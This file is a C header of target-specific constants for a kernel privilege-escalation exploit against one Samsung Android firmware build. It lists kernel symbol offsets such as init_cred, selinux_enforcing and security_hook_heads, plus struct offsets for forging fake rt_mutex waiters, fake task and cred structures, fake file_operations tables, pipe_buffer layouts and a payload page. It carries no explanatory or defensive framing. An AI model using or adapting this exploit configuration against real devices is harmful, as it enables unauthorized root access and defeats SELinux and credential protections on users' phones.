#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "ghost-hoock"
#define BUILD_FINGERPRINT "samsung/a17/bza5"

/* Kernel address space (VA_BITS=39) */
#define KIMAGE_TEXT_BASE 0xffffffc080000000ULL
#define P0_PAGE_OFFSET   0xffffff8000000000ULL
#define P0_PHYS_OFFSET   0x40000000ULL
#define P0_KERNEL_PHYS_LOAD 0x40000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END   0xffffff8c00000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END  0xffffff9000000000ULL
#define VMEMMAP_START   0xfffffffec0000000ULL

/* --- Global symbol offsets (kallsyms, BZA5) --- */
#define INIT_TASK_OFF          0x024FCF40ULL
#define INIT_CRED_OFF          0x02512B08ULL
#define INIT_UTS_NS_OFF        0x02685A88ULL
#define EMPTY_ZERO_PAGE_OFF    0x02726000ULL
#define ROOT_TASK_GROUP_OFF    0x0272ED80ULL
#define SELINUX_ENFORCING_OFF  0x0277E560ULL
#define KPTR_RESTRICT_OFF      0x024FB678ULL
#define CAP_CAPABLE_ACTIVE_OFF 0x02776030ULL
#define SELINUX_BLOB_SIZES_OFF 0x018A10E8ULL
#define SECURITY_HOOK_HEADS_OFF 0x01846480ULL
#define KMALLOC_CACHES_OFF     0x018974C0ULL
#define ANON_PIPE_BUF_OPS_OFF  0x0126EF88ULL
#define CONFIGFS_READ_ITER_OFF      0x00512CE4ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x00512F18ULL
#define COPY_SPLICE_READ_OFF   0x0048E7D4ULL
#define NOOP_LLSEEK_OFF        0x0043BB44ULL
#define ASHMEM_MISC_FOPS_OFF   0x0ULL
#define ASHMEM_FOPS_OFF        0x013FB018ULL
#define ASHMEM_IOCTL_OFF       0x00DD8FA0ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x00DD9588ULL
#define ASHMEM_MMAP_OFF        0x00DD9604ULL
#define ASHMEM_OPEN_OFF        0x00DD9660ULL
#define ASHMEM_RELEASE_OFF     0x00DD9060ULL
#define ASHMEM_SHOW_FDINFO_OFF 0x00DD9560ULL

/* --- Derived macros --- */
#define INIT_TASK           (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_CRED           (KIMAGE_TEXT_BASE + INIT_CRED_OFF)
#define INIT_UTS_NS         (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define EMPTY_ZERO_PAGE     (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP     (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING   (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)

/* fake-cred back-links (fill_init_cred_copy in spray.c) */
#define INIT_SEC_OFF      0x018EB3B8ULL
#define INIT_USER_NS_OFF  0x025113C0ULL
#define INIT_UCOUNTS_OFF  0x02512FF8ULL
#define INIT_GROUPS_OFF   0x02512B00ULL
#define ROOT_USER_OFF     0x02511638ULL
#define INIT_SEC      (KIMAGE_TEXT_BASE + INIT_SEC_OFF)
#define INIT_USER_NS  (KIMAGE_TEXT_BASE + INIT_USER_NS_OFF)
#define INIT_UCOUNTS  (KIMAGE_TEXT_BASE + INIT_UCOUNTS_OFF)
#define INIT_GROUPS   (KIMAGE_TEXT_BASE + INIT_GROUPS_OFF)
#define ROOT_USER     (KIMAGE_TEXT_BASE + ROOT_USER_OFF)

#define SELINUX_BLOB_SIZES  (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES      (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS   (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)
#define ASHMEM_MISC_FOPS    (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS         (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL        (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP         (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN         (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE      (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO  (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER      (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ    (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK         (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)

/* --- pselect waiter word shift (BZA5: pselect vs select diff) --- */
#define PSELECT_WAITER_WORD_SHIFT 0

/* --- Struct field offsets (BTF verified) --- */
#define WAITER_LOCAL_OFF          0x80
#define WAITER_TREE_ENTRY_OFF     0x00
#define WAITER_PI_TREE_ENTRY_OFF  0x28
#define WAITER_TASK_OFF           0x50
#define WAITER_LOCK_OFF           0x58
#define WAITER_WAKE_STATE_OFF     0x60
#define WAITER_PRIO_OFF           0x18
#define WAITER_DEADLINE_OFF       0x20
#define WAITER_WW_CTX_OFF         0x68

#define FAKE_WAITER_TREE_PRIO_OFF         0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF     0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF     0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF      0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF  0x48
#define FAKE_WAITER_TASK_OFF              0x50
#define FAKE_WAITER_LOCK_OFF              0x58
#define FAKE_WAITER_WAKE_STATE_OFF        0x60
#define FAKE_WAITER_WW_CTX_OFF            0x68

#define FAKE_TASK_USAGE_OFF          0x40
#define FAKE_TASK_PRIO_OFF           0x94
#define FAKE_TASK_NORMAL_PRIO_OFF    0x9c
#define FAKE_TASK_TASK_GROUP_OFF     0x420
#define FAKE_TASK_PI_LOCK_OFF        0x9ec
#define FAKE_TASK_PI_WAITERS_OFF     0xa00
#define FAKE_TASK_PI_TOP_TASK_OFF    0xa10
#define FAKE_TASK_PI_BLOCKED_ON_OFF  0xa18

#define MM_OWNER_OFF             0x410
#define TASK_PID_OFF             0x708
#define TASK_TGID_OFF            0x70c
#define TASK_REAL_PARENT_OFF     0x718
#define TASK_ATOMIC_FLAGS_OFF    0x6c8
#define TASK_REAL_CRED_OFF       0x8f8
#define TASK_CRED_OFF            0x900
#define TASK_COMM_OFF            0x910
#define TASK_TASKS_OFF           0x638
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF         0x9c8

/* cred struct */
#define CRED_UID_OFF         8
#define CRED_SECUREBITS_OFF  40
#define CRED_CAPS_OFF        48
#define CRED_SECURITY_OFF    128
#define SELINUX_CRED_BLOB_OFF  0
#define SELINUX_CRED_OSID_OFF  0
#define SELINUX_CRED_SID_OFF   4

/* struct page */
#define STRUCT_PAGE_SIZE              0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF         0x08
#define STRUCT_PAGE_TYPE_OFF          0x30

/* pipe buffer */
#define PIPE_BUFFER_SIZE         0x28
#define PIPE_BUFFER_SLOTS        32
#define PIPE_BUF_FLAG_CAN_MERGE  0x10

/* fake fops table slots */
#define FOPS_OWNER_OFF        0x00
#define FOPS_LLSEEK_OFF       0x10
#define FOPS_READ_OFF         0x18
#define FOPS_WRITE_OFF        0x20
#define FOPS_READ_ITER_OFF    0x28
#define FOPS_WRITE_ITER_OFF   0x30
#define FOPS_IOCTL_OFF        0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF         0x60
#define FOPS_OPEN_OFF         0x68
#define FOPS_RELEASE_OFF      0x78
#define FOPS_SPLICE_READ_OFF  0xb8
#define FOPS_SHOW_FDINFO_OFF  0xd8

/* payload page layout */
#define LOCK_OFF      0x0E80
#define W0_OFF        0x1180
#define FOPS_OFF      0x0F80
#define SCRATCH_OFF   0x1200
#define RIGHT_OFF     0x1240
#define LEFT_OFF      0x1260
#define FAKE_TASK_OFF 0x1280
#define CRED_COPY_OFF 0x1080

#endif
